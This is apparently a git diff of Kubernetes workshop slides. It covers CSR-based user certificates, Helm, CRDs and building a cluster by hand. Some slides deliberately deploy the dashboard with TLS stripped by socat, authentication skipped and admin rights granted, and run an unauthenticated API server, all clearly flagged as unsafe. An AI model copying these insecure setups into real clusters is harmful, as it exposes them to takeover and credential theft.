## Checking our new copy of DockerCoins
- We can check the worker logs, or the web UI
.exercise[
- Retrieve the NodePort number of the web UI:
```bash
kubectl get service webui --namespace=magenta
```
- Open it in a web browser
- Look at the worker logs:
```bash
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
```
]
Note: it might take a minute or two for the worker to start.

View File

@@ -1,426 +0,0 @@
# The CSR API
- The Kubernetes API exposes CSR resources
- We can use these resources to issue TLS certificates
- First, we will go through a quick reminder about TLS certificates
- Then, we will see how to obtain a certificate for a user
- We will use that certificate to authenticate with the cluster
- Finally, we will grant some privileges to that user
---
## Reminder about TLS
- TLS (Transport Layer Security) is a protocol providing:
- encryption (to prevent eavesdropping)
- authentication (using public key cryptography)
- When we access an https:// URL, the server authenticates itself
(it proves its identity to us; as if it were "showing its ID")
- But we can also have mutual TLS authentication (mTLS)
(client proves its identity to server; server proves its identity to client)
---
## Authentication with certificates
- To authenticate, someone (client or server) needs:
- a *private key* (that remains known only to them)
- a *public key* (that they can distribute)
- a *certificate* (associating the public key with an identity)
- A message encrypted with the private key can only be decrypted with the public key
(and vice versa)
- If I use someone's public key to encrypt / decrypt their messages,
<br/>
I can be certain that I am talking to them / they are talking to me
- The certificate proves that I have the correct public key for them
---
## Certificate generation workflow
This is what I do if I want to obtain a certificate.
1. Create public and private key.
2. Create a Certificate Signing Request (CSR).
(The CSR contains the identity that I claim and an expiration date.)
3. Send that CSR to the Certificate Authority (CA).
4. The CA verifies that I can claim the identity in the CSR.
5. The CA generates my certificate and gives it to me.
The CA (or anyone else) never needs to know my private key.
---
## The CSR API
- The Kubernetes API has a CertificateSigningRequest resource type
(we can list them with e.g. `kubectl get csr`)
- We can create a CSR object
(= upload a CSR to the Kubernetes API)
- Then, using the Kubernetes API, we can approve / deny the request
- If we approve the request, the Kubernetes API generates a certificate
- The certificate gets attached to the CSR object and can be retrieved
---
## Using the CSR API
- We will show how to use the CSR API to obtain user certificates
- This will be a rather complex demo
- ... And yet, we will take a few shortcuts to simplify it
(but it will illustrate the general idea)
- The demo also won't be automated
(we would have to write extra code to make it fully functional)
---
## General idea
- We will create a Namespace named "users"
- Each user will get a ServiceAccount in that Namespace
- That ServiceAccount will give read/write access to *one* CSR object
- Users will use that ServiceAccount's token to submit a CSR
- We will approve the CSR (or not)
- Users can then retrieve their certificate from their CSR object
- ... And use that certificate for subsequent interactions
---
## Resource naming
For a user named `jean.doe`, we will have:
- ServiceAccount `jean.doe` in Namespace `users`
- CertificateSigningRequest `users:jean.doe`
- ClusterRole `users:jean.doe` giving read/write access to that CSR
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
---
## Creating the user's resources
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
.exercise[
- Create the global namespace for all users:
```bash
kubectl create namespace users
```
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
```bash
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
```
]
---
## Extracting the user's token
- Let's obtain the user's token and give it to them
(the token will be their password)
.exercise[
- List the user's secrets:
```bash
kubectl --namespace=users describe serviceaccount jean.doe
```
- Show the user's token:
```bash
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
```
]
---
## Configure `kubectl` to use the token
- Let's create a new context that will use that token to access the API
.exercise[
- Add a new identity to our kubeconfig file:
```bash
kubectl config set-credentials token:jean.doe --token=...
```
- Add a new context using that identity:
```bash
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
```
]
---
## Access the API with the token
- Let's check that our access rights are set properly
.exercise[
- Try to access any resource:
```bash
kubectl get pods
```
(This should tell us "Forbidden")
- Try to access "our" CertificateSigningRequest:
```bash
kubectl get csr users:jean.doe
```
(This should tell us "NotFound")
]
---
## Create a key and a CSR
- There are many tools to generate TLS keys and CSRs
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
.exercise[
- Generate the key and certificate signing request:
```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
```
]
The command above generates:
- a 2048-bit RSA key, without DES encryption, stored in key.pem
- a CSR for the name `jean.doe` in group `devs`
---
## Inside the Kubernetes CSR object
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
- The PEM file needs to be encoded to base64 on a single line
(we will use `base64 -w0` for that purpose)
- The Kubernetes CSR object also needs to list the right "usages"
(these are flags indicating how the certificate can be used)
---
## Sending the CSR to Kubernetes
.exercise[
- Generate and create the CSR resource:
```bash
kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
name: users:jean.doe
spec:
request: $(base64 -w0 < csr.pem)
usages:
- digital signature
- key encipherment
- client auth
EOF
```
]
---
## Adjusting certificate expiration
- By default, the CSR API generates certificates valid 1 year
- We want to generate short-lived certificates, so we will lower that to 1 hour
- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
.exercise[
- Edit the static pod definition for the controller manager:
```bash
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
```
- In the list of flags, add the following line:
```bash
- --experimental-cluster-signing-duration=1h
```
]
---
## Verifying and approving the CSR
- Let's inspect the CSR, and if it is valid, approve it
.exercise[
- Switch back to `cluster-admin`:
```bash
kctx -
```
- Inspect the CSR:
```bash
kubectl describe csr users:jean.doe
```
- Approve it:
```bash
kubectl certificate approve users:jean.doe
```
]
---
## Obtaining the certificate
.exercise[
- Switch back to the user's identity:
```bash
kctx -
```
- Retrieve the certificate from the CSR:
```bash
kubectl get csr users:jean.doe \
-o jsonpath={.status.certificate} \
| base64 -d > cert.pem
```
- Inspect the certificate:
```bash
openssl x509 -in cert.pem -text -noout
```
]
---
## Using the certificate
.exercise[
- Add the key and certificate to kubeconfig:
```bash
kubectl config set-credentials cert:jean.doe --embed-certs \
--client-certificate=cert.pem --client-key=key.pem
```
- Update the user's context to use the key and cert to authenticate:
```bash
kubectl config set-context jean.doe --user cert:jean.doe
```
- Confirm that we are seen as `jean.doe` (but don't have permissions):
```bash
kubectl get pods
```
]
---
## What's missing?
We shown, step by step, a method to issue short-lived certificates for users.
To be usable in real environments, we would need to add:
- a kubectl helper to automatically generate the CSR and obtain the cert
(and transparently renew the cert when needed)
- a Kubernetes controller to automatically validate and approve CSRs
(checking that the subject and groups are valid)
- a way for the users to know the groups to add to their CSR
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
---
## Is this realistic?
- Larger organizations typically integrate with their own directory
- The general principle, however, is the same:
- users have long-term credentials (password, token, ...)
- they use these credentials to obtain other, short-lived credentials
- This provides enhanced security:
- the long-term credentials can use long passphrases, 2FA, HSM ...
- the short-term credentials are more convenient to use
- we get strong security *and* convenience
- Systems like Vault also have certificate issuance mechanisms

View File

@@ -36,9 +36,7 @@
## Creating a daemon set
<!-- ##VERSION## -->
- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
- Unfortunately, as of Kubernetes 1.12, the CLI cannot create daemon sets
--
@@ -73,13 +71,18 @@
- Dump the `rng` resource in YAML:
```bash
kubectl get deploy/rng -o yaml >rng.yml
kubectl get deploy/rng -o yaml --export >rng.yml
```
- Edit `rng.yml`
]
Note: `--export` will remove "cluster-specific" information, i.e.:
- namespace (so that the resource is not tied to a specific namespace)
- status and creation timestamp (useless when creating a new resource)
- resourceVersion and uid (these would cause... *interesting* problems)
---
## "Casting" a resource to another

View File

@@ -2,60 +2,88 @@
- Kubernetes resources can also be viewed with a web dashboard
- That dashboard is usually exposed over HTTPS
- We are going to deploy that dashboard with *three commands:*
(this requires obtaining a proper TLS certificate)
1) actually *run* the dashboard
- Dashboard users need to authenticate
2) bypass SSL for the dashboard
- We are going to take a *dangerous* shortcut
3) bypass authentication for the dashboard
---
--
## The insecure method
There is an additional step to make the dashboard available from outside (we'll get to that)
- We could (and should) use [Let's Encrypt](https://letsencrypt.org/) ...
- ... but we don't want to deal with TLS certificates
- We could (and should) learn how authentication and authorization work ...
- ... but we will use a guest account with admin access instead
--
.footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]
---
## Running a very insecure dashboard
## 1) Running the dashboard
- We are going to deploy that dashboard with *one single command*
- We need to create a *deployment* and a *service* for the dashboard
- This command will create all the necessary resources
- But also a *secret*, a *service account*, a *role* and a *role binding*
(the dashboard itself, the HTTP wrapper, the admin/guest account)
- All these resources are defined in a YAML file
- All we have to do is load that YAML file with with `kubectl apply -f`
- All these things can be defined in a YAML file and created with `kubectl apply -f`
.exercise[
- Create all the dashboard resources, with the following command:
```bash
kubectl apply -f ~/container.training/k8s/insecure-dashboard.yaml
kubectl apply -f ~/container.training/k8s/kubernetes-dashboard.yaml
```
]
---
## 2) Bypassing SSL for the dashboard
- The Kubernetes dashboard uses HTTPS, but we don't have a certificate
- Recent versions of Chrome (63 and later) and Edge will refuse to connect
(You won't even get the option to ignore a security warning!)
- We could (and should!) get a certificate, e.g. with [Let's Encrypt](https://letsencrypt.org/)
- ... But for convenience, for this workshop, we'll forward HTTP to HTTPS
.warning[Do not do this at home, or even worse, at work!]
---
## Running the SSL unwrapper
- We are going to run [`socat`](http://www.dest-unreach.org/socat/doc/socat.html), telling it to accept TCP connections and relay them over SSL
- Then we will expose that `socat` instance with a `NodePort` service
- For convenience, these steps are neatly encapsulated into another YAML file
.exercise[
- Apply the convenient YAML file, and defeat SSL protection:
```bash
kubectl apply -f ~/container.training/k8s/socat.yaml
```
]
.warning[All our dashboard traffic is now clear-text, including passwords!]
---
## Connecting to the dashboard
.exercise[
- Check which port the dashboard is on:
```bash
kubectl get svc dashboard
kubectl -n kube-system get svc socat
```
]
@@ -85,7 +113,26 @@ The dashboard will then ask you which authentication you want to use.
- "skip" (use the dashboard "service account")
- Let's use "skip": we're logged in!
- Let's use "skip": we get a bunch of warnings and don't see much
---
## 3) Bypass authentication for the dashboard
- The dashboard documentation [explains how to do this](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)
- We just need to load another YAML file!
.exercise[
- Grant admin privileges to the dashboard so we can see our resources:
```bash
kubectl apply -f ~/container.training/k8s/grant-admin-to-dashboard.yaml
```
- Reload the dashboard and enjoy!
]
--
@@ -93,11 +140,73 @@ The dashboard will then ask you which authentication you want to use.
---
## Exposing the dashboard over HTTPS
- We took a shortcut by forwarding HTTP to HTTPS inside the cluster
- Let's expose the dashboard over HTTPS!
- The dashboard is exposed through a `ClusterIP` service (internal traffic only)
- We will change that into a `NodePort` service (accepting outside traffic)
.exercise[
- Edit the service:
```
kubectl edit service kubernetes-dashboard
```
]
--
`NotFound`?!? Y U NO WORK?!?
---
## Editing the `kubernetes-dashboard` service
- If we look at the [YAML](https://github.com/jpetazzo/container.training/blob/master/k8s/kubernetes-dashboard.yaml) that we loaded before, we'll get a hint
--
- The dashboard was created in the `kube-system` namespace
--
.exercise[
- Edit the service:
```bash
kubectl -n kube-system edit service kubernetes-dashboard
```
- Change type `type:` from `ClusterIP` to `NodePort`, save, and exit
<!--
```wait Please edit the object below```
```keys /ClusterIP```
```keys ^J```
```keys cwNodePort```
```keys ^[ ``` ]
```keys :wq```
```keys ^J```
-->
- Check the port that was assigned with `kubectl -n kube-system get services`
- Connect to https://oneofournodes:3xxxx/ (yes, https)
]
---
## Running the Kubernetes dashboard securely
- The steps that we just showed you are *for educational purposes only!*
- If you do that on your production cluster, people [can and will abuse it](https://redlock.io/blog/cryptojacking-tesla)
- If you do that on your production cluster, people [can and will abuse it](https://blog.redlock.io/cryptojacking-tesla)
- For an in-depth discussion about securing the dashboard,
<br/>

View File

@@ -1,20 +1,6 @@
## Declarative vs imperative in Kubernetes
- With Kubernetes, we cannot say: "run this container"
- All we can do is write a *spec* and push it to the API server
(by creating a resource like e.g. a Pod or a Deployment)
- The API server will validate that spec (and reject it if it's invalid)
- Then it will store it in etcd
- A *controller* will "notice" that spec and act upon it
---
## Reconciling state
- Virtually everything we create in Kubernetes is created from a *spec*
- Watch for the `spec` fields in the YAML files later!

View File

@@ -1,67 +0,0 @@
## 19,000 words
They say, "a picture is worth one thousand words."
The following 19 slides show what really happens when we run:
```bash
kubectl run web --image=nginx --replicas=3
```
---
class: pic
![](images/kubectl-run-slideshow/01.svg)
---
class: pic
![](images/kubectl-run-slideshow/02.svg)
---
class: pic
![](images/kubectl-run-slideshow/03.svg)
---
class: pic
![](images/kubectl-run-slideshow/04.svg)
---
class: pic
![](images/kubectl-run-slideshow/05.svg)
---
class: pic
![](images/kubectl-run-slideshow/06.svg)
---
class: pic
![](images/kubectl-run-slideshow/07.svg)
---
class: pic
![](images/kubectl-run-slideshow/08.svg)
---
class: pic
![](images/kubectl-run-slideshow/09.svg)
---
class: pic
![](images/kubectl-run-slideshow/10.svg)
---
class: pic
![](images/kubectl-run-slideshow/11.svg)
---
class: pic
![](images/kubectl-run-slideshow/12.svg)
---
class: pic
![](images/kubectl-run-slideshow/13.svg)
---
class: pic
![](images/kubectl-run-slideshow/14.svg)
---
class: pic
![](images/kubectl-run-slideshow/15.svg)
---
class: pic
![](images/kubectl-run-slideshow/16.svg)
---
class: pic
![](images/kubectl-run-slideshow/17.svg)
---
class: pic
![](images/kubectl-run-slideshow/18.svg)
---
class: pic
![](images/kubectl-run-slideshow/19.svg)

View File

@@ -1,837 +0,0 @@
# Building our own cluster
- Let's build our own cluster!
*Perfection is attained not when there is nothing left to add, but when there is nothing left to take away. (Antoine de Saint-Exupery)*
- Our goal is to build a minimal cluster allowing us to:
- create a Deployment (with `kubectl run` or `kubectl create deployment`)
- expose it with a Service
- connect to that service
- "Minimal" here means:
- smaller number of components
- smaller number of command-line flags
- smaller number of configuration files
---
## Non-goals
- For now, we don't care about security
- For now, we don't care about scalability
- For now, we don't care about high availability
- All we care about is *simplicity*
---
## Our environment
- We will use the machine indicated as `dmuc1`
(this stands for "Dessine Moi Un Cluster" or "Draw Me A Sheep",
<br/>in homage to Saint-Exupery's "The Little Prince")
- This machine:
- runs Ubuntu LTS
- has Kubernetes, Docker, and etcd binaries installed
- but nothing is running
---
## Checking our environment
- Let's make sure we have everything we need first
.exercise[
- Log into the `dmuc1` machine
- Get root:
```bash
sudo -i
```
- Check available versions:
```bash
etcd -version
kube-apiserver --version
dockerd --version
```
]
---
## The plan
1. Start API server
2. Interact with it (create Deployment and Service)
3. See what's broken
4. Fix it and go back to step 2 until it works!
---
## Dealing with multiple processes
- We are going to start many processes
- Depending on what you're comfortable with, you can:
- open multiple windows and multiple SSH connections
- use a terminal multiplexer like screen or tmux
- put processes in the background with `&`
<br/>(warning: log output might get confusing to read!)
---
## Starting API server
.exercise[
- Try to start the API server:
```bash
kube-apiserver
# It will fail with "--etcd-servers must be specified"
```
]
Since the API server stores everything in etcd,
it cannot start without it.
---
## Starting etcd
.exercise[
- Try to start etcd:
```bash
etcd
```
]
Success!
Note the last line of output:
```
serving insecure client requests on 127.0.0.1:2379, this is strongly discouraged!
```
*Sure, that's discouraged. But thanks for telling us the address!*
---
## Starting API server (for real)
- Try again, passing the `--etcd-servers` argument
- That argument should be a comma-separated list of URLs
.exercise[
- Start API server:
```bash
kube-apiserver --etcd-servers http://127.0.0.1:2379
```
]
Success!
---
## Interacting with API server
- Let's try a few "classic" commands
.exercise[
- List nodes:
```bash
kubectl get nodes
```
- List services:
```bash
kubectl get services
```
]
So far, so good.
Note: the API server automatically created the `kubernetes` service entry.
---
class: extra-details
## What about `kubeconfig`?
- We didn't need to create a `kubeconfig` file
- By default, the API server is listening on `localhost:8080`
(without requiring authentication)
- By default, `kubectl` connects to `localhost:8080`
(without providing authentication)
---
## Creating a Deployment
- Let's run a web server!
.exercise[
- Create a Deployment with NGINX:
```bash
kubectl create deployment web --image=nginx
```
]
Success?
---
## Checking our Deployment status
.exercise[
- Look at pods, deployments, etc.:
```bash
kubectl get all
```
]
Our Deployment is in a bad shape:
```
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/web 0/1 0 0 2m26s
```
And, there is no ReplicaSet, and no Pod.
---
## What's going on?
- We stored the definition of our Deployment in etcd
(through the API server)
- But there is no *controller* to do the rest of the work
- We need to start the *controller manager*
---
## Starting the controller manager
.exercise[
- Try to start the controller manager:
```bash
kube-controller-manager
```
]
The final error message is:
```
invalid configuration: no configuration has been provided
```
But the logs include another useful piece of information:
```
Neither --kubeconfig nor --master was specified.
Using the inClusterConfig. This might not work.
```
---
## Reminder: everyone talks to API server
- The controller manager needs to connect to the API server
- It *does not* have a convenient `localhost:8080` default
- We can pass the connection information in two ways:
- `--master` and a host:port combination (easy)
- `--kubeconfig` and a `kubeconfig` file
- For simplicity, we'll use the first option
---
## Starting the controller manager (for real)
.exercise[
- Start the controller manager:
```bash
kube-controller-manager --master http://localhost:8080
```
]
Success!
---
## Checking our Deployment status
.exercise[
- Check all our resources again:
```bash
kubectl get all
```
]
We now have a ReplicaSet.
But we still don't have a Pod.
---
## What's going on?
In the controller manager logs, we should see something like this:
```
E0404 15:46:25.753376 22847 replica_set.go:450] Sync "default/web-5bc9bd5b8d"
failed with `No API token found for service account "default"`, retry after the
token is automatically created and added to the service account
```
- The service account `default` was automatically added to our Deployment
(and to its pods)
- The service account `default` exists
- But it doesn't have an associated token
(the token is a secret; creating it requires signature; therefore a CA)
---
## Solving the missing token issue
There are many ways to solve that issue.
We are going to list a few (to get an idea of what's happening behind the scenes).
Of course, we don't need to perform *all* the solutions mentioned here.
---
## Option 1: disable service accounts
- Restart the API server with
`--disable-admission-plugins=ServiceAccount`
- The API server will no longer add a service account automatically
- Our pods will be created without a service account
---
## Option 2: do not mount the (missing) token
- Add `automountServiceAccountToken: false` to the Deployment spec
*or*
- Add `automountServiceAccountToken: false` to the default ServiceAccount
- The ReplicaSet controller will no longer create pods referencing the (missing) token
.exercise[
- Programmatically change the `default` ServiceAccount:
```bash
kubectl patch sa default -p "automountServiceAccountToken: false"
```
]
---
## Option 3: set up service accounts properly
- This is the most complex option!
- Generate a key pair
- Pass the private key to the controller manager
(to generate and sign tokens)
- Pass the public key to the API server
(to verify these tokens)
---
## Continuing without service account token
- Once we patch the default service account, the ReplicaSet can create a Pod
.exercise[
- Check that we now have a pod:
```bash
kubectl get all
```
]
Note: we might have to wait a bit for the ReplicaSet controller to retry.
If we're impatient, we can restart the controller manager.
---
## What's next?
- Our pod exists, but it is in `Pending` state
- Remember, we don't have a node so far
(`kubectl get nodes` shows an empty list)
- We need to:
- start a container engine
- start kubelet
---
## Starting a container engine
- We're going to use Docker (because it's the default option)
.exercise[
- Start the Docker Engine:
```bash
dockerd
```
]
Success!
Feel free to check that it actually works with e.g.:
```bash
docker run alpine echo hello world
```
---
## Starting kubelet
- If we start kubelet without arguments, it *will* start
- But it will not join the cluster!
- It will start in *standalone* mode
- Just like with the controller manager, we need to tell kubelet where the API server is
- Alas, kubelet doesn't have a simple `--master` option
- We have to use `--kubeconfig`
- We need to write a `kubeconfig` file for kubelet
---
## Writing a kubeconfig file
- We can copy/paste a bunch of YAML
- Or we can generate the file with `kubectl`
.exercise[
- Create the file `kubeconfig.kubelet` with `kubectl`:
```bash
kubectl --kubeconfig kubeconfig.kubelet config \
set-cluster localhost --server http://localhost:8080
kubectl --kubeconfig kubeconfig.kubelet config \
set-context localhost --cluster localhost
kubectl --kubeconfig kubeconfig.kubelet config \
use-context localhost
```
]
---
## All Kubernetes clients can use `kubeconfig`
- The `kubeconfig.kubelet` file has the same format as e.g. `~/.kubeconfig`
- All Kubernetes clients can use a similar file
- The `kubectl config` commands can be used to manipulate these files
- This highlights that kubelet is a "normal" client of the API server
---
## Our `kubeconfig.kubelet` file
The file that we generated looks like the one below.
That one has been slightly simplified (removing extraneous fields), but it is still valid.
```yaml
apiVersion: v1
kind: Config
current-context: localhost
contexts:
- name: localhost
context:
cluster: localhost
clusters:
- name: localhost
cluster:
server: http://localhost:8080
```
---
## Starting kubelet
.exercise[
- Start kubelet with that `kubeconfig.kubelet` file:
```bash
kubelet --kubeconfig kubeconfig.kubelet
```
]
Success!
---
## Looking at our 1-node cluster
- Let's check that our node registered correctly
.exercise[
- List the nodes in our cluster:
```bash
kubectl get nodes
```
]
Our node should show up.
Its name will be its hostname (it should be `dmuc1`).
---
## Are we there yet?
- Let's check if our pod is running
.exercise[
- List all resources:
```bash
kubectl get all
```
]
--
Our pod is still `Pending`. 🤔
--
Which is normal: it needs to be *scheduled*.
(i.e., something needs to decide on which node it should go.)
---
## Scheduling our pod
- Why do we need a scheduling decision, since we have only one node?
- The node might be full, unavailable; the pod might have constraints ...
- The easiest way to schedule our pod is to start the scheduler
(we could also schedule it manually)
---
## Starting the scheduler
- The scheduler also needs to know how to connect to the API server
- Just like for controller manager, we can use `--kubeconfig` or `--master`
.exercise[
- Start the scheduler:
```bash
kube-scheduler --master http://localhost:8080
```
]
- Our pod should now start correctly
---
## Checking the status of our pod
- Our pod will go through a short `ContainerCreating` phase
- Then it will be `Running`
.exercise[
- Check pod status:
```bash
kubectl get pods
```
]
Success!
---
class: extra-details
## Scheduling a pod manually
- We can schedule a pod in `Pending` state by creating a Binding, e.g.:
```bash
kubectl create -f- <<EOF
apiVersion: v1
kind: Binding
metadata:
name: name-of-the-pod
target:
apiVersion: v1
kind: Node
name: name-of-the-node
EOF
```
- This is actually how the scheduler works!
- It watches pods, takes scheduling decisions, creates Binding objects
---
## Connecting to our pod
- Let's check that our pod correctly runs NGINX
.exercise[
- Check our pod's IP address:
```bash
kubectl get pods -o wide
```
- Send some HTTP request to the pod:
```bash
curl `X.X.X.X`
```
]
We should see the `Welcome to nginx!` page.
---
## Exposing our Deployment
- We can now create a Service associated to this Deployment
.exercise[
- Expose the Deployment's port 80:
```bash
kubectl expose deployment web --port=80
```
- Check the Service's ClusterIP, and try connecting:
```bash
kubectl get service web
curl http://`X.X.X.X`
```
]
--
This won't work. We need kube-proxy to enable internal communication.
---
## Starting kube-proxy
- kube-proxy also needs to connect to API server
- It can work with the `--master` flag
(even though that will be deprecated in the future)
.exercise[
- Start kube-proxy:
```bash
kube-proxy --master http://localhost:8080
```
]
---
## Connecting to our Service
- Now that kube-proxy is running, we should be able to connect
.exercise[
- Check the Service's ClusterIP again, and retry connecting:
```bash
kubectl get service web
curl http://`X.X.X.X`
```
]
Success!
---
class: extra-details
## How kube-proxy works
- kube-proxy watches Service resources
- When a Service is created or updated, kube-proxy creates iptables rules
.exercise[
- Check out the `OUTPUT` chain in the `nat` table:
```bash
iptables -t nat -L OUTPUT
```
- Traffic is sent to `KUBE-SERVICES`; check that too:
```bash
iptables -t nat -L KUBE-SERVICES
```
]
For each Service, there is an entry in that chain.
---
class: extra-details
## Diving into iptables
- The last command showed a chain named `KUBE-SVC-...` corresponding to our service
.exercise[
- Check that `KUBE-SVC-...` chain:
```bash
iptables -t nat -L `KUBE-SVC-...`
```
- It should show a jump to a `KUBE-SEP-...` chains; check it out too:
```bash
iptables -t nat -L `KUBE-SEP-...`
```
]
This is a `DNAT` rule to rewrite the destination address of the connection to our pod.
This is how kube-proxy works!
---
class: extra-details
## kube-router, IPVS
- With recent versions of Kubernetes, it is possible to tell kube-proxy to use IPVS
- IPVS is a more powerful load balancing framework
(remember: iptables was primarily designed for firewalling, not load balancing!)
- It is also possible to replace kube-proxy with kube-router
- kube-router uses IPVS by default
- kube-router can also perform other functions
(e.g., we can use it as a CNI plugin to provide pod connectivity)
---
class: extra-details
## What about the `kubernetes` service?
- If we try to connect, it won't work
(by default, it should be `10.0.0.1`)
- If we look at the Endpoints for this service, we will see one endpoint:
`host-address:6443`
- By default, the API server expects to be running directly on the nodes
(it could be as a bare process, or in a container/pod using host network)
- ... And it expects to be listening on port 6443 with TLS

View File

@@ -1,220 +0,0 @@
# Extending the Kubernetes API
There are multiple ways to extend the Kubernetes API.
We are going to cover:
- Custom Resource Definitions (CRDs)
- Admission Webhooks
---
## Revisiting the API server
- The Kubernetes API server is a central point of the control plane
(everything connects to it: controller manager, scheduler, kubelets)
- Almost everything in Kubernetes is materialized by a resource
- Resources have a type (or "kind")
(similar to strongly typed languages)
- We can see existing types with `kubectl api-resources`
- We can list resources of a given type with `kubectl get <type>`
---
## Creating new types
- We can create new types with Custom Resource Definitions (CRDs)
- CRDs are created dynamically
(without recompiling or restarting the API server)
- CRDs themselves are resources:
- we can create a new type with `kubectl create` and some YAML
- we can see all our custom types with `kubectl get crds`
- After we create a CRD, the new type works just like built-in types
---
## What can we do with CRDs?
There are many possibilities!
- *Operators* encapsulate complex sets of resources
(e.g.: a PostgreSQL replicated cluster; an etcd cluster...
<br/>
see [awesome operators](https://github.com/operator-framework/awesome-operators) and
[OperatorHub](https://operatorhub.io/) to find more)
- Custom use-cases like [gitkube](https://gitkube.sh/)
- creates a new custom type, `Remote`, exposing a git+ssh server
- deploy by pushing YAML or Helm charts to that remote
- Replacing built-in types with CRDs
(see [this lightning talk by Tim Hockin](https://www.youtube.com/watch?v=ji0FWzFwNhA&index=2&list=PLj6h78yzYM2PZf9eA7bhWnIh_mK1vyOfU))
---
## Little details
- By default, CRDs are not *validated*
(we can put anything we want in the `spec`)
- When creating a CRD, we can pass an OpenAPI v3 schema (BETA!)
(which will then be used to validate resources)
- Generally, when creating a CRD, we also want to run a *controller*
(otherwise nothing will happen when we create resources of that type)
- The controller will typically *watch* our custom resources
(and take action when they are created/updated)
*
Examples:
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
*
---
## Service catalog
- *Service catalog* is another extension mechanism
- It's not extending the Kubernetes API strictly speaking
(but it still provides new features!)
- It doesn't create new types; it uses:
- ClusterServiceBroker
- ClusterServiceClass
- ClusterServicePlan
- ServiceInstance
- ServiceBinding
- It uses the Open service broker API
---
## Admission controllers
- When a Pod is created, it is associated to a ServiceAccount
(even if we did not specify one explicitly)
- That ServiceAccount was added on the fly by an *admission controller*
(specifically, a *mutating admission controller*)
- Admission controllers sit on the API request path
(see the cool diagram on next slide, courtesy of Banzai Cloud)
---
class: pic
![API request lifecycle](images/api-request-lifecycle.png)
---
## Admission controllers
- *Validating* admission controllers can accept/reject the API call
- *Mutating* admission controllers can modify the API request payload
- Both types can also trigger additional actions
(e.g. automatically create a Namespace if it doesn't exist)
- There are a number of built-in admission controllers
(see [documentation](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#what-does-each-admission-controller-do) for a list)
- But we can also define our own!
---
## Admission Webhooks
- We can setup *admission webhooks* to extend the behavior of the API server
- The API server will submit incoming API requests to these webhooks
- These webhooks can be *validating* or *mutating*
- Webhooks can be setup dynamically (without restarting the API server)
- To setup a dynamic admission webhook, we create a special resource:
a `ValidatingWebhookConfiguration` or a `MutatingWebhookConfiguration`
- These resources are created and managed like other resources
(i.e. `kubectl create`, `kubectl get` ...)
---
## Webhook Configuration
- A ValidatingWebhookConfiguration or MutatingWebhookConfiguration contains:
- the address of the webhook
- the authentication information to use with the webhook
- a list of rules
- The rules indicate for which objects and actions the webhook is triggered
(to avoid e.g. triggering webhooks when setting up webhooks)
---
## (Ab)using the API server
- If we need to store something "safely" (as in: in etcd), we can use CRDs
- This gives us primitives to read/write/list objects (and optionally validate them)
- The Kubernetes API server can run on its own
(without the scheduler, controller manager, and kubelets)
- By loading CRDs, we can have it manage totally different objects
(unrelated to containers, clusters, etc.)
---
## Documentation
- [Custom Resource Definitions: when to use them](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/)
- [Custom Resources Definitions: how to use them](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/)
- [Service Catalog](https://kubernetes.io/docs/concepts/extend-kubernetes/service-catalog/)
- [Built-in Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/)
- [Dynamic Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)

View File

@@ -111,7 +111,7 @@
- Display that key:
```
kubectl logs deployment/flux | grep identity
kubectl logs deployment flux | grep identity
```
- Then add that key to the repository, giving it **write** access
@@ -234,6 +234,6 @@
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
- Gitkube can also deploy Helm charts
- Gitkube can also deploy Helm Charts
(instead of raw YAML files)

View File

@@ -1,4 +1,4 @@
# Healthchecks (extra material)
# Healthchecks
- Kubernetes provides two kinds of healthchecks: liveness and readiness

View File

@@ -164,15 +164,74 @@ The chart's metadata includes an URL to the project's home page.
---
## Viewing installed charts
## Creating a chart
- Helm keeps track of what we've installed
- We are going to show a way to create a *very simplified* chart
- In a real chart, *lots of things* would be templatized
(Resource names, service types, number of replicas...)
.exercise[
- List installed Helm charts:
- Create a sample chart:
```bash
helm list
helm create dockercoins
```
- Move away the sample templates and create an empty template directory:
```bash
mv dockercoins/templates dockercoins/default-templates
mkdir dockercoins/templates
```
]
---
## Exporting the YAML for our application
- The following section assumes that DockerCoins is currently running
.exercise[
- Create one YAML file for each resource that we need:
.small[
```bash
while read kind name; do
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
done <<EOF
deployment worker
deployment hasher
daemonset rng
deployment webui
deployment redis
service hasher
service rng
service webui
service redis
EOF
```
]
]
---
## Testing our helm chart
.exercise[
- Let's install our helm chart! (`dockercoins` is the path to the chart)
```
helm install dockercoins
```
]
--
- Since the application is already deployed, this will fail:<br>
`Error: release loitering-otter failed: services "hasher" already exists`
- To avoid naming conflicts, we will deploy the application in another *namespace*

Some files were not shown because too many files have changed in this diff Show More